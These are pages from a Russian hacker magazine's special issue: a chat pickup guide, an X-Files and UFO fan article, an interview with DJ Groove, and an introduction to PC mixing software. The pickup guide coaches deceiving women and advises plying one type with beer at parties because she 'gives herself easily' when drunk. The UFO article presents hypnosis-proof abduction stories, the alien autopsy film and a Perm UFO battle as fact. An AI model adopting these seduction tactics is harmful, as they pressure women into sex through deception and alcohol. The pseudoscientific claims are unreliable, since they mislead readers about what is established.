Самая большая категория. В основном в Сети именно такие. Очень хороший вариант, чтобы замутить длительные отношения. Но можно замутить что угодно, главное — затащить её в постель.

Плюс: возможно, это твоя будущая любовь.

Минус: часто встречаются психопатки и девушки с о-о-очень большим мнением о себе.

Как с ней разговаривать: Спокойно. Вот здесь ты сможешь проявить все свои интеллектуальные способности. Темы про Сеть, компьютеры, пьянки, наркоманию — отдыхают. Не вздумай! Лучше поговори с ней о жизни. Расскажи какую-нибудь весёлую историю. Порасспрашивай её о том, чем она увлекается, что читает, какую музыку и фильмы любит. Я думаю ты легко поймёшь, что это за человек уже через 15-20 минут разговора. Такие девочки очень любят откровенные разговоры, поэтому политика должна быть такой: начинаешь с обычных фраз типа «Как дела? Чем занимаешься?», потом постепенно переводишь разговор на тему женщин (не о том, что «все бабы — дуры», а о твоём отношении к разным женщинам), теперь о-о-о-о-очень плавно переводи разговор на тему постели, только не резко, а так, невзначай. Расскажи ей какой ты на самом деле рыцарь, и что так тяжело в наше время найти приличную девушку, которая и не заторможена, но и не думает только о деньгах и сексе (Именно! Ты должен показать, что секс для тебя важен, но стоит на втором месте. Но на втором, а не на третьем. А тебя часто одолевают либо ищущие «спонсора», либо сексуальные маньячки, с которыми не о чем побеседовать). Скажи ей, что одностишье Вишневского: «Любимая! Да ты ещё и собеседник!», — ты воспринимаешь серьёзно. Ты всегда искал девушку, с которой тебе будет интересно общаться и проводить время, а не только спать. Не употребляй слов типа «трахаться», «перепихнуться», «в натуре», «подстава» и т.д. Старайся выглядеть прилично, но не тормозом. Нет, ну конечно, тормоз — тоже механизм, но она об этом не знает. Комплименты такие девушки любят, но нестандартные. Вообще, если будешь банален, то спать будешь с порно-сервером, поэтому прояви всю свою фантазию. Не предлагай встретится в первый же день. Если она тебе предложит, откажись. Но не потому, что ты считаешь неприличным вот так вот сразу, а потому, что ты занят. А вот через пару дней вашего знакомства — действуй! Предложи ей поужинать вместе в какой-нибудь кафешке либо сходить в театр. Причём со словами: «Мне тут друзья сказали, что на этой неделе в МХАТе будет Гамлет в современной постановке! Обещают нечто совершенно необычное. Я так хочу туда попасть! Мне бы было очень приятно, если бы ты составила мне компанию». И если при встрече ты будешь продолжать вести себя галантно и не скучно, то через пару дней узнаешь, какова она в постели.


Спецвыпуск хакер, номер #001, стр. 001-026-4, Как поиметь девочку из чата?

Как поиметь девочку из чата?

Спецвыпуск хакер, номер #001, стр. 001-026-4

«Да я, блин, ваще, оттягиваюсь по кайфу!»

И такие тоже встречаются. И нередко, между прочим. Вполне возможно, что всё это простые понты. Она просто старается выглядеть круто (интересно, кто им рассказывает, что так разговаривать — это круто?). Но бывает, что она и в жизни такая же.

Плюс: Бутылка «Балтики №9», пакет чипсов, 2 билета на концерт в «Горбушке», и она твоя. Причём ты сможешь с ней потрахаться где угодно, хоть на чердаке, хоть на свалке металлолома.

Минус: Вполне возможно, что тебе придётся учить её регулярно мыть голову и стирать одежду, хоть иногда.

Как с ней разговаривать: Отвязно. Фразы типа: «Ну мы с пацанами вчера тах набухались, что Коляныч блевал весь вечер», — здесь проходят совершенно спокойно. Старайся не болтать с ней об Интернете. Расскажи ей, что ты любишь музыку потяжелее и, вообще, ненавидишь попсу и всяких гопников. Побольше рассказывай ей о том, какой ты крутой, как ты один бил морду десятерым, а ещё тридцать убежали от страха. Стиль разговора у тебя должен быть такой, как будто тебе «всё по хрену». Наобещай ей кучу развлечений. Только предлагать встретиться таким девушкам надо вот так: «О! Блин! Кстати! Я тут на такую тусу собираюсь забуриться! Поехали со мной? И тусанёмся по кайфу, и познакомимся заодно!» Когда встретитесь, сразу покупай ей пива, погуляй немного, поболтай, а потом лучше всего поехать к каким-нибудь друзьям (твоим или её — безразлично). Такие девушки очень легко отдаются на всяких тусах, где много выпивки.


Спецвыпуск хакер, номер #001, стр. 001-026-5, Как поиметь девочку из чата?

Как поиметь девочку из чата?

Спецвыпуск хакер, номер #001, стр. 001-026-5

«Да я вообще-то редко

в Интернете. Сегодня весь день с подругой

по магазинам гуляла.

Кофточку от Армани

купила».

В мажорных девушках, конечно, есть свой кайф, но и неприятностей тоже куча. Хотя, прежде всего её надо рассматривать как девушку, ты ведь потрахаться собрался, а не женится.

Плюс: если быть альфонсом тебе не претит, то здесь у тебя есть шанс. Да и потом, с ней ты сможешь посетить много «крутых» мест.

Минус: Если она ищёт «настоящего мужчину», то тебе придётся как следует разорится, чтобы держать себя на уровне.

Как с ней разговаривать: Очень сложный вопрос. Дело в том, что такие люди делятся на 2 типа. Если её родители только недавно стали крутыми, то ей будет хотеться, чтоб ты был «птицей её полёта». Она будет очень высоко задирать нос и прежде всего будет смотреть на размер твоего бумажника, твою машину (если есть), твою одежду и т.д. Тебе придётся водить её в дорогие рестораны, потому что она считает, что так крута, что не может ужинать «в этом «гадюшнике» — Макдональдсе». А если она уже давно в состоянии «крутости», то ей не важно, как у тебя дела с финансами, ей главное, чтобы ты был хорошим человеком.

Итак, говори с ней обо всём. Если она начинает заводить разговор о крутых шмотках и подобном, плавно переводи разговор на другую тему. Старайся вообще не обсуждать то, что может показать твоё финансовое положение. А такие провокации она будет устраивать постоянно. Твоя задача — показать, что с деньгами у тебя всё нормально. Именно нормально. То есть ты — не миллионер, но и не нищий. И вообще, не любишь разговаривать о деньгах, ведь существуют тысячи других тем. И потом, тебе интересна прежде всего она, а не всякие посторонние вещи. Если темы, связанные с финансами, она будет заводить редко, значит, не всё потерянно. Можешь побеседовать с ней об искусстве и кино, об Интернете и компьютерах (только без технических подробностей), в общем обо всём. Главное для тебя — выяснить, что для нее главное. Если она задирает нос, плюнь на неё и больше вообще с ней не общайся. Если всё ОК, то разговаривай просто, так же как и с любой нормальной девчонкой. Клубы, театры, кино, выставки — это должно быть тем, что тебя окружает в жизни в её глазах. А вот приглашать её лучше всего на какую-нибудь вечеринку. Советую первую встречу провести не наедине, а в кругу друзей.

Вместо эпилога.

Вообще, Интернет, конечно, хорошая штука для знакомства, только вот в Сети все безлики. Общаясь с кем-нибудь в чате, ты общаешься с тенью. Поэтому ты не должен забывать о фотках. У каждой интернетчицы есть отсканированные фотки (если она не первый день в Сети). Так что не стесняйся, проси, чтобы прислала. А лучше всего две или три. Дело в том, что, во-первых, не только ты умеешь обращаться с Photoshop’ом. А во-вторых, когда девушка присылает тебе только одну фотку, будь уверен, это та, на которой она получилась лучше всего, а в жизни она может оказаться совсем другой. Теперь, что касается твоих фотографий. Постарайся отсканить их как можно больше. И желательно в разных прикидах и местах. Не забывай, в Сети ты сталкиваешься с разными типами девчонок, и каждой ты будешь отсылать что-то своё, что ей понравится. Металлистке — фотку, где ты в косухе. Девочке-паиньке — где ты в чистых джинсах и рубашке. Мажорной — где ты в пиджаке и галстуке и т.д. Выправи в Photoshop’е цвета, сделай изображение поконтрастней и чуть поярче, если требуется. Все фотки у тебя должны быть в формате JPG, причём сохраняй их с качеством 6 (в Photoshop). Потому как, если фотография весит больше 100 Кб, качать её довольно противно.


Спецвыпуск хакер, номер #001, стр. 001-026-6, Как поиметь девочку из чата?

Как поиметь девочку из чата?

Спецвыпуск хакер, номер #001, стр. 001-026-6

Да, кстати! Чтоб ты особо губки не раскатывал, я скажу тебе, что существуют и профессиональные приколисты. Которые и поговорят с тобой, и фотки пришлют, вот только встречаться почему-то не захотят. А потом ты узнаешь, что это был парень. :) Так что будь на чеку! И вперёд, Ромео!


Спецвыпуск хакер, номер #001, стр. 001-030-1, X-FILES & X-NET

X-FILES & X-NET

Спецвыпуск хакер, номер #001, стр. 001-030-1

Геннадий Крэк-о-делов (Dr.Cod@xakep.ru)

Субботний вечер, 23:20, я выключаю телевизор. На этот раз агенты ФБР спасались от плотоядных древесных жучков. Из ушей лезет адреналин. Я вновь развинчиваю телефон на предмет прослушивания. Выглядываю в окно, мой сосед напротив ведет себя очень странно. На всякий случай заглядываю под диван (не затаились ли там жучки).

Нужно срочно с кем-то обсудить увиденное. В чате на официальном сайте X-files (http://www.the-xfiles.com/fanforum.htm) как всегда полно народу:

« smoking man: Ребята, слышали анекдот? Приходит Скалли домой, а дверь открыта. Ну она сразу Маулдеру звонить на сотовый. Он не отвечает. Скалли достает пистолет, осторожно заходит в квартиру. Из-под двери сортира сочится странный свет. Она распахивает дверь и видит напарника в обнимку с унитазом:

— Маулдер! Что ты делаешь???

— Ищу свой телефон!»

Теперь нужно срочно рассказать анекдот, в русском чате на нашем сайте (http://www.chat.ru /~x_fans/). Затем нужно срочно посмотреть энтомологический справочник, вдруг те плотоядные жучки на самом деле есть. А то ведь не усну!! Трехпалый дятел жрет эту дрянь за милую душу, спи спокойно (http://www.yars.free.net /English/Science/YSU/Dept/Biol/bioldat/zool/0045.ru.htm)!

Даже папаша Дэвида Амран Духовны не удержался от статьи в Интернет (http://dominique. simplenet.com/x/my-son.htm) «Я не понимаю жизнь моего сына во всем». И правильно, какие у секретного агента Маулдера могут быть от нас с тобой секреты? Он же для нас в сети как рыбка в аквариуме. Сначала, мол, мальчик рос таким «brilliant» и спокойным, в классе первым был с «brilliant» чувством юмора. Все удивлялся, как это мим на Бродвее стоит так долго и не писается. Потом даже в университет поступил, но тут модельные агентства всякие... Словом, учебе «good bay» сказал. И теперь житуха у папаши просто невыносимая, звонят всякие «little girls», Дэвида просят. А иногда и открытки посылают, майл забивают. Амран от фэновских магазинов просто шарахается. Особенно после того, как однажды от фэнов убегать пришлось. Говорят они по телефону с сыном ровно 6 раз в месяц. А мама, которая «furious», все время спрашивает Маулдера по телефону, когда тот свое высшее образование закончит. Телезвезда смеется и говорит «later...later» (позже то есть). А еще папе очень сложно проследить за любовью сына, так как вокруг еще со школы слишком много женщин. Папа все волнуется, дедушкой хочет стать, надо больше общаться с Интернетом, может, успокоился бы...

А недавно на Дэвида обозлился весь Ванкувер, откуда тот линять собрался в Лос-Анджелес, где его новая жена Тиа Леони живет. Да еще, мол, съемки переносите туда же. Словом, теперь над многими престижными ванкуверскими клубами висит красочная табличка: «David Duchovny — go home». А в газетах появляются статьи типа «бедный Дэвид весь мокрый» (ирония по поводу почти тропических ливней в городе, где снимают X-Files) . Правда, Крис Картер руками и ногами упирается, не хочет съемки переносить. ( на сайте http://www.mjq.net/xfiles/ море таких статей, а также всякие скандальные фотки Х-агентов)


Спецвыпуск хакер, номер #001, стр. 001-030-2, X-FILES & X-NET

X-FILES & X-NET

Спецвыпуск хакер, номер #001, стр. 001-030-2

Если тебе очень хочется пообщаться с Дэвидом Духовны есть такая штука как «Web ring». Это когда ты карточку прям на сайте заполняешь и то, что напишешь, прям к нему, любимому, и попадает (например, на серваке duchovnyfan. ifrance.com/duchovnyfan). Я бы заколебался все это читать. Кстати, Филипп Киркоров пытался что-то такое устроить в русской сети, желание у него пропало быстро. Почти все мои знакомые интернетчики отправили туда по матерному звонку.

Можешь еще записаться в фанклуб официального сайта «секретных материалов» www.thex-files.com.Там ты еще сможешь скачать всякие игрушки, музыку, темы для Windows и, конечно, фотки героев. Но куда приятней отправить, например, наш журнал с этой статьей им по почте. По-русски они, конечно, не умеют, куда им! Но глаза-то у них есть, себя они там узнают. А вот и адресочки:

Chris Carter, исполнительный продюсер,

«The X Files,» c/o Fox Broadcasting

Company, P.O. Box 900, Beverly Hills, CA 90213.

Почта для фанатов David Duchovny и Gillian Anderson: Studio Fan Mail/(имя актера), 1122 South Robertson Blvd., Los Angeles, CA 90035.

Все они время от времени появляются в чатах, об этом предупреждают примерно за неделю на www.TheX-Files.com. Недавно там был Крис Картер (продюсер и главный автор материалов). Тех, у кого есть собственные сюжеты и идеи для X-Files, Крис Картер посылает в известное место (которое так не любит наш корректор). О том, что идеи не принимаются, написано во многих местах в сети.

Если ты подключен к сети и ты фэн «материалов», то телевизор тебе практически не нужен. А если бы по сети можно бы было смотреть все серии, а не только эпизоды, то я бы давно выкинул ящик в окно. Туда и дорога этому куску д...

Можешь ты, к примеру, узнать, что агент FBI достает из широких штанин в случае опасности? Не угадал! Это же Sig Sauer P228 (http://www. remtek.com/arms/sig/model/228/228.htm) . Компактный пистолет, с хорошим убойным калибром M11. Через Интернет я могу фотку скачать и технические данные. Да что там! Лучше куплю себе такой же, через сеть, вмести с костюмом и табличкой «FBI special agent Crack-o-delov». И ментов пугать пойду! Не веришь? А Масхадов как насчет оружия договаривался... цсссс — военная тайна. (http://win.www.online.ru/sp/sof/02_97/ 02.rhtml)

Или, может быть, ты ответишь, откуда Картер сюжеты берет или чьи портреты весят в кабинете Маулдера. Ну что полез в сеть? Картер лопатит UFO журналы и сайты как экскаватор! А портреты президента и главного прокурора BK & JR (Била Клинтона и Дженет Реноу ). Все это я узнал из «часто задаваемых вопросов о Х-файлах» (FAQ) на сайте http://www.geocities. com/Area51/Nebula /8844/faq.htm. Есть похожие русские сайты http://kenga.ru: 8100/personal/asy/xfiles.html, там тебе, наконец, объяснят, как номеруются серии.

Да что там, есть даже мультимедиа энциклопедии про Х-файлы http://www.user.cityline.ru/~itbsean/allfoto.htm. Если ты такую себе достанешь, то будешь просто Х-спецом. Ребята с сайта http://x-files.lipetsk.ru тоже продают 2 PC-шных компакта о Секретных материалах. Правда, хозяин сайта оказался жлобом, и не дал нам диски на тестирование, поэтому что там на них записано, я тебе сказать не могу.


Спецвыпуск хакер, номер #001, стр. 001-030-3, X-FILES & X-NET

X-FILES & X-NET

Спецвыпуск хакер, номер #001, стр. 001-030-3

Зато истинное наслаждение всей редакции Х принесло чтение сексуальных фантазий фэнов сериала. «Мы со Скалли подъезжаем к биоорганическому заводу. Я знаю, что объект там...У нее такие упругие бедра и нежные губы, кажется, она использует любой момент, чтобы привлечь мой ненасытный взгляд. Я понимаю, что я хочу эту женщину...Правительство опять пытается скрыть информацию о практике контактов. Но мы просто не имеем права потерять нить на этот раз, ведь истина где-то рядом... ». Словом, по моему мнению, если бы Крис Картер помер, то он бы в гробу перевернулся от этакого народного творчества. Особенно от фэновского юмора http:// www.scibernet.com/xfiles/misc/humor.html.

Выключи телевизор

и действуй сам!

Но просто смотреть X-Files — это одно. А вот стать саму агентом — это совсем другое. И Сеть тут — лучший помощник. Картер всего лишь обобщил наши с тобой собственные представления о приключениях агентов. Ведь ты и я не раз слышали историю о катастрофе в Pозуэлле (http://cdl.bmstu.ru/ufo/book1/roswell.html). Сначала почти все местные радиостанции передали о катастрофе НЛО, все местные газеты опубликовали это происшествие. Затем приехали военные, и на следующий день было готово опровержение у тех же газет и радиостанций.

Но в ту роковую для инопланетян грозу было слишком много свидетелей! Некоторые видели даже трупы пришельцев. Тайна передавалась из поколения в поколение. И лет через 25 мир увидел фильм вскрытия пришельцев. Об этом фильме Стивин Кинг сказал: «Если бы существовал человек, который так смог подделать вскрытие, он бы работал у меня». Есть и многочисленные заключения анатомов и киноэкспертов о подлинности фильма.

В 60-х психиатры лезли на стену. Каждая вторая женщина считала своим долгом поведать о своих сексуальных отношениях с пришельцами.

И это сложно было назвать фантазиями, т.к. под гипнозом невозможно лгать. Сейчас психиатры уже на потолке (хорошее дело — привычка). (http://www.ghosts.org/)

Так что любому хорошо информированному чел’у близки Х-файлы. А если он интернетчик, то тем более! Он же видел фотографии лица и пирамид, сходных с египетскими на Марсе (http://www.hawastsoc.org/solar/eng/face.htm). Ему доступны рассказы российских космонавтов о встречах с «объектами» ( http://cdl.bmstu. ru/~rf/biblio.html). Он, конечно же, знает про «Русский Розуэлл». Близ Перми 16 сентября 1989 года над портом Заостравка проходил настоящий бой 4-х НЛО. За этим наблюдал практически весь город, т.к. то и дело вырубалось электричество. Сбитая тарелка хлопнулась в болота летом близ нашей Пермской секретной базы «Белая Башня». Только зимой туда направили трех офицеров во главе с начальником базы (по льду можно пройти по топям). Позже эти ребята поступили в госпиталь с жуткими радиационными ожогами и пожизненными благами за молчание. Вспоминаете «Секретные»? А уфологи, сразу же бросившиеся туда, обнаружили лишь следы вездехода. И теперь призывают всех: «Возможно, кто-то был свидетелем транспортировки объекта в ЖИТКУР или может сообщить дополнительные подробности об этой катастрофе НЛО? ОЧЕВИДЦЫ — ОТЗОВИТЕСЬ! Анонимность при необходимости гарантируется. Пишите по адресу: 614010, г.ПЕРМЬ-10, а/я 6303, РУФОРС, СУББОТИНУ Н.В.; или в Ярославский УФОцентр.


Спецвыпуск хакер, номер #001, стр. 001-030-4, X-FILES & X-NET

X-FILES & X-NET

Спецвыпуск хакер, номер #001, стр. 001-030-4

Отныне над пермскими топями самолеты летать не могут — с ума сходят даже немагнитные приборы. А не веришь — пиши мне или Субботину, мы уж тебя убедим (http:// cdl.bmstu.ru/~rf/text/rufors0002.html).

Вырывать секреты у пентагонщиков (шняжников и гонщиков, сидящих в пентагоне), которые так важны для нас с тобой, призваны сетевые Рробин Гуды — ХАКЕРЫ. Пока они только примериваются к NASA’вским (www.nasa.gov) «top secret archives», слушают на самодельных приемниках военные переговоры, пробираются на объекты. Кстати, тренироваться можно в Москве. Академия Генерального Штаба (http://www.ancentr.ru/texts/warrior5.htm), что на м. Юго-Западная, — самый настоящий пентагон. Они полностью к твоим услугам, только я тебе про это не говорил. Я верю в то, что придет день, когда мы натянем всех секретчиков, и мир узнает страшную правду...

НЛО уже давно часть нашей жизни. Железный способ познакомиться даже с самой неприступной девушкой (www.analsex.com), это спросить: «Ты веришь в инопланетян?» (можно «в неземную жизнь» по твоему вкусу). После обсуждения свежей серии X-Files она расскажет о собственном опыте контактов, а ты про устройство, что стоит у тебя на подоконнике.

У каждого продвинутого уфолога компьютер подключен к сети, а на подоконнике стоит детектор НЛО (http://cdl.bmstu.ru/~rf/text/rufors 0001.html). Делают его так:

Возьми кусочек дерева, медную проволоку, дверной звонок и батарейку, не забудь мощный магнит. Соедини все, как показано на рисунке. При появлении НЛО магнитное поле будет раскачивать магнит. Проволока заденет за кольцо, и, услышав звонок, ты побежишь с твоей новой подругой среди ночи смотреть на небо. Прибор реагирует на магнитное поле, поэтому ставь его подальше от лифта. Лучше помести его в стеклянную банку, чтобы поток воздуха не раскачивал магнит. Если ты крутой радиолюбитель, то можешь собрать ЭМ детектор на транзюках.

И, потом, какой хороший повод отправиться с твоей боевой подругой по аномальным местам нашей родины (http://kit.sumy. ua/user/max_ssu/crasher.htm). Их ты тоже найдешь в сети. И ее родители (если имеются в наличии) на это запросто купятся. Я уверен, что у вас приключения будут почище, чем у Скалли с Маулдером. Мы-то с тобой понимаем, что просто коллегами с боевой подругой быть скучно и сложно.

Вобщем, если ты не просто пассивный зритель, то в Сети ты найдешь немало интересных вещей обо всяких аномалиях. И, возможно, когда-нибудь, кто-нибудь (Спилберг, например), решит снять фильм о твоих собственных похождениях. Главное — отдери задницу от дивана и действуй!

Удачной UFO охоты!

Есть еще идея поехать всем скопом... подумай об этом.


Спецвыпуск хакер, номер #001, стр. 001-034-1, DJ Groove

DJ Groove

Спецвыпуск хакер, номер #001, стр. 001-034-1

Сергей Покровский pokrovsky@xakep.ru

Весна, девочки. Хочется чего-нибудь особенного... Мы нашли свой способ. Теперь мы все крутые музыканты и диджеи. А чтобы быть вообще круче всех, мы решили поболтать об этом с диджеем Грувом.

X: Грув, расскажи, пожалуйста, как ты используешь компьютер. То есть ты на нем только семплируешь звуки или что-то еще?

G: У меня есть IBM, который я использую как нотную тетрадку. У меня есть программа Cubase 3-й версии, которую я очень давно использую, просто издавна на ней работаю. Отличная программа для того, чтобы собирать в ней музыкальные кусочки. Специальными звуковыми картами я никогда не пользовался, ничего подобного у меня не было. Компьютер у меня всегда работал только как нотная тетрадка. А все семплеры, клавиши, синтезаторы и т.д. у меня существуют отдельно.

И еще у меня есть компьютер Macintosh и в нем программа ProTools. Вот ее я использую для записи голоса. Я синхронизирую Мак вместе с IBM, получается очень удобно. Один у меня — нотная тетрадь, а другой только для записи голоса и редактирования его. Я убираю какие-то неточности, если исполнитель фальшиво поет, то у меня есть программа AudioTune, в которой питчем я поднимаю или опускаю тон голоса.

X: А что ты используешь кроме компьютера?

G: В основном для написания музыки я использую разную аппаратуру, а компьютер — это скорее некий довесок. У меня есть разные синтезаторы. Я использую от 4 до 6 синтезаторов одновременно. Очень мне нравится звук Roland’а. Еще у меня есть пульт Yamaha и различные обработчики: компрессоры, гормонайзер и т.д.

X: А как ты думаешь, реально писать музыку только на компьютере, не используя всякую специальную аппаратуру?

G: Да, реально конечно. Но для этого нужна серьезная звуковая плата, и тогда можно сделать композицию только на компьютере. Главное, чтобы были хорошие программы. Так как большинство программ, которые используют ребята, которые делают музыку только на компьютерах, в основном не профессиональны. Они присылают мне демо-пленки, и я сразу чувствую, что многие вещи не доделаны. Нужно поставить хорошие программы, и тогда все вполне реально. Правда, я очень плохо разбираюсь в компьютерных программах, всяких микшерских пультах, с помощью которых можно сводить прямо в компьютере, но, я думаю, что хорошие программы уже есть. Раньше я еще семплировал в компьютере ритмы, но последнее время даже этим не занимаюсь, потому что я приобрел классную драм-машину, на которой все и делаю.

X: Грув, а как ты думаешь, тяжело писать музыку на компе? Или, в принципе, этим может заниматься каждый?

G: Ты знаешь, возможности изучить любую технику есть у каждого человека. Когда я учился в классе оперного вокала, мне говорили: «Людей без голоса нет, есть люди не умеющие петь». В принципе, очень верно подмечено. Мне кажется, что любой человек, который захочет этим заниматься и будет настырным, сможет это сделать. Самое главное — нужна настырность и постоянно докапываться до всех тонкостей. Я ведь тоже начинал с нуля. Я не знал компьютеров, как синтезировать звук, как обращаться с программами, как все это соединять, как объединять инструменты, как в пульте повернуть ручку и какую повернуть. До всего этого я дошел сам. Мне кажется, что если молодой человек или девушка захотят создать хорошую композицию, — они смогут это сделать. Просто для этого им понадобятся долгие годы практики, и методом проб и ошибок они все равно придут к тому, что станут создавать что-нибудь более профессиональное. Главное, не останавливаться. Потому как многие только немного узнают и уже считают себя профессионалами, а на самом деле, чтобы стать профессионалом, нужны годы. А то многие думают: «А! Напихал разных звуков и нормально! И колбасит!», а на самом-то деле нужно точно подстроить бочки под басы, настроить каналы, частотки, да и много чего другого.


Спецвыпуск хакер, номер #001, стр. 001-034-2, DJ Groove

DJ Groove

Спецвыпуск хакер, номер #001, стр. 001-034-2

X: Грув, а ты компьютер используешь только для музыки или можно где-нибудь в чате в Интернете тебя увидеть? ;-)

G: Нет. Только для музыки. Никаких игрушек, ни в Интернет никогда не лазаю, ничего. У меня просто нет для этого времени, да и не нужно мне это. Вот Илюха Лагутенко, когда уехал в Англию, сидел в Интернете под другим именем и разговаривал с людьми. А я не спешу за этим, я не гонюсь. У меня очень много времени уходит на написание музыки, так что Интернет пока проходит мимо меня.

X: А с чего это ты вдруг начал писать музыку? Интересно, что это тебя просто в один день так переклинило? Ты же диджеем всегда был!

G: На самом деле, я профессиональный диджей с 90-го года и тогда же начал писать музыку. Просто известен большим массам я стал в 96-м, а так я и до этого писал музыку, издавался, даже в Англии. Я тогда писал BreakBeat, Techno, по тем временам это вообще было непонятным для всех. Я просто в один прекрасный момент увидел классную аппаратуру и помню это состояние, я понял, что вот оно, то, что я хочу — я хочу создавать, делать это своими руками. Никакое сексуальное влечение, никакой наркотик не может сравниться с созданием своей музыки, хотя я и не употребляю наркотики.

X: Знаешь, сейчас существует множество программ, с помощью которых можно диджействовать прямо у компьютера. Там тебе и вертушки, там тебе и питчи, и кросфейдеры, сиди, дави на кнопки и наслаждайся. Как ты к этому относишься?

G: Да, я знаю о таких программах. Ну что ж, раз там можно все это делать, то классно. Но все-таки это игрушки, я борюсь за то, что музыку надо создавать руками, все делать самому.

X: А тебе не бывает обидно, что ты год мучался, записал какую-то композицию, а какой-нибудь диджей ее в свой микс вставил и всю славу получил?

G: Ну, такого еще ни разу не было. Может быть только подражание стилю. А слава из одной композиции не может получиться. Нужно понять весь стиль. Ведь диджеев-то не за одну композицию любят, а за весь их стиль.

X: Нет, Грув, погоди. Ну, ты же знаешь об этой войне между музыкантами и диджеями, когда музыканты трудятся, пишут, а диджеи вставляют эту музыку в свои миксы, и все их любят, а про музыканта никто даже не знает!

G: Ну, я всегда говорил, что диджейство — это легкий хлеб. Особенно сейчас. Раньше все было по-другому, я помню, как приезжал в Москву и обстреливал народ в клубах непонятными звуками, а теперь все не так.


Спецвыпуск хакер, номер #001, стр. 001-034-3, DJ Groove

DJ Groove

Спецвыпуск хакер, номер #001, стр. 001-034-3

X: А на диджействе и музицировании можно реальных денег заработать или это так... хобби?

G: Запросто. А диджейство — это вообще очень простой заработок денег, но это не очень хорошо. Потому что лично для меня, например, диджейство было не заработком денег, а тем, что мне нравилось, во что я вкладывал душу и пытался изучить досконально. А сейчас очень много диджеев, которые настолько непрофессиональны, многие не чувствуют музыку, не говоря уже о технике. То есть люди просто зашибают бабки. Я тоже кручусь во всем этом шоу-бизнесе, но я еще и пытаюсь продвигать определенную музыку, кроме того, что просто зарабатывать деньги.

X: А что бы ты мог посоветовать начинающим музыкантам?

G: Во-первых, пытайтесь найти как можно больше полезных программ, для того чтобы действительно профессионально записать музыку. Пытайтесь сами создавать звуки, а не пользоваться готовыми семплами, а если уж пользуетесь, то хотя бы редактируйте их. Будьте постоянно в курсе всех новинок. Например, мой звукоинженер залезает в Интернет и показывает мне определенные звуки (как видишь, у меня есть, в принципе, человек, который держит меня в курсе). Еще нужно до всего докапываться самому. Чтобы понимать, как и что нужно делать. Хотя не надо слишком сильно уходить в технику, иначе музыкальный позыв немного притупится. Поэтому я советую держать баланс, чтоб не совсем уйти в компьютер и остаться все-таки и с музыкой. Это очень важно. Ну, и чтобы у вас никогда не зависал Cubase, сохраняйтесь почаще. Я, например, пользуюсь магнито-оптикой, потому как считаю, что все эти флоппи диски — это вообще вчерашний век. И не жалейте денег на звуковые карты, все-таки от них тоже очень много зависит. Музыка — это бизнес, а значит нужно постоянно двигаться вперед. Покажите кому-нибудь свои композиции, найдите спонсора, вложите деньги в аппаратуру, потому как если вы хотите писать профессиональную музыку, то должны задуматься и о коммерческой стороне. В общем, главное — будьте напористыми, познавайте, старайтесь, и все будет ОК.


Спецвыпуск хакер, номер #001, стр. 001-038-1, Сам себе Грув

Сам себе Грув

Холод

Спецвыпуск хакер, номер #001, стр. 001-038-1

Предположим, чувак, что ты однажды пришел из опыревшего тебе учебного заведения и просто так, неожиданно и без повода обнаружил в себе крутой музыкальный талант, который рвется наружу. Короче, ты решил, что тебе нужно срочно затусоваться DJем в какой-нибудь прогрессивный музыкальный клуб и начать играть на вертушках. И тебе абсолютно акваланг, что ты никогда не видел живых вертушек ближе чем с расстояния до экрана TV (а может, ты их вообще никогда не видел?), главное — что ты хочешь на них играть, делать, не побоюсь этого слова, музыку. Но вот беда: приходишь ты в музыкальный магазин и выпадаешь в осадок. Оказывается, вертушки средней похабности стоят столько, сколько твой папа за год получает. Это обламывает (если не обламывает, то можешь купить себе эти вертушки и на этом закончить чтение статьи). Есть, конечно, другой вариант — купить на Митинском радиорынке два вертогроба с музыкой (проигрыватели грампластинок типа «Вега») и портить на них винил, на который тебе, приятель, никакой стипендии не хватит. Но это — саксовый вариант, учитывая, что никакого качества тебе на них не видать в принципе. А может, тебе вертушки вообще нужны, так сказать, на один раZ — совратить своим умением какую-нибудь крутую герлу на очередном сейшене. Причем перед сейшеном у тебя нет никакого желания изучать какой-нибудь сложный софт и делать что-то радикально новое и свое...

Так вот к чему мы это все говорим... Приятель! Предлагаем тебе абсолютно альтернативный вариант решения всех твоих маленьких траблов по соблазнению герлов и музыкальному творчеству. Это — РС сводилки, маленькие программки, с помощью которых ты сможешь показать кому угодно, где раком зимуют, и заодно выплеснуть свой музыкальный потенциал, как говорится, наружу. Достать эти проги просто, пользоваться ими — еще проще. Так что впитывай. Но если ты в музыкальных перипетиях еще лам, то выясни для себя значение пары следующих примитивных терминов, которыми мы будем пользоваться по ходу всей статьи.

Первый термин — «сэмпл» (англ. Sample). Это некий готовый звук (может быть куском звучания некоего инструмента или какого-нибудь вокала). В твоем крутейшем миксе ты заставляешь звучать несколько сэмплов последовательно или параллельно, накладывая в нужный момент один на другой.

Под понятием «готовый» сэмпл мы, как минимум, понимаем, что он ложится в определенный «BPM» (англ. Beats-per-minute). BPM определяет темп композиции в количестве ударов в минуту. Чем больше значение BPM, тем быстрее композиция. В обычном хаусе среднее значение темпа составляет около 130-140 ВРМ. В софте, который мы будем использовать, все сэмплы уже подогнаны по темпу друг под друга.

Так. Теперь «Луп» (англ. Loop), или «петля». Луп — это непрерывно повторяющийся кусок музыкального произведения. То есть, это, к примеру, часть партии ударных или пакет монотонно повторяющихся FХов. Лупы используются повсеместно, ты с ними будешь работать постоянно. Привыкай.

Еще нам понадобится понятие «питч» (англ. Pitch). Эта фигня определяет высоту звучания сэмпла. Питч можно повышать и понижать на какое-то количество полутонов (к слову сказать, у пианино между двумя соседними клавишами разница звучания как раз в полутон), и это, соответственно, заставит сам сэмпл звучать выше или ниже.


Спецвыпуск хакер, номер #001, стр. 001-038-2, Сам себе Грув

Сам себе Грув

Холод

Спецвыпуск хакер, номер #001, стр. 001-038-2

Дальше. Понятие «пэннинг» (англ. Panning). Пэннинг определяет, в какой колонке или ухе, левых или правых, будет звучать сэмпл. Изменяя пэннинг, можно сделать так, чтобы звук плавно перетекал из одного уха в другое, и , таким образом, получить офигительный стерео эффект.

Ну вот, этих терминов должно хватить. Если ты не врубился, что к чему, то перечитай эти три абзаца еще раз. Если ты перечитал и опять не врубился, то просто переходи к следующему абзацу — врубишься по ходу дела.

Итак, мы подкинем тебе три проги — The Groovemaker, The Mixman Studio и эдакий дочерний продукт Mixman studio: P-Funk edition. Они хороши тем, что их может раздобыть даже тот человек, у которого нет денег (или возможности) для очередной поездки на Митинский сейл. Демо-версии каждой из них лежат в Инете и доступны для свободной заливки.

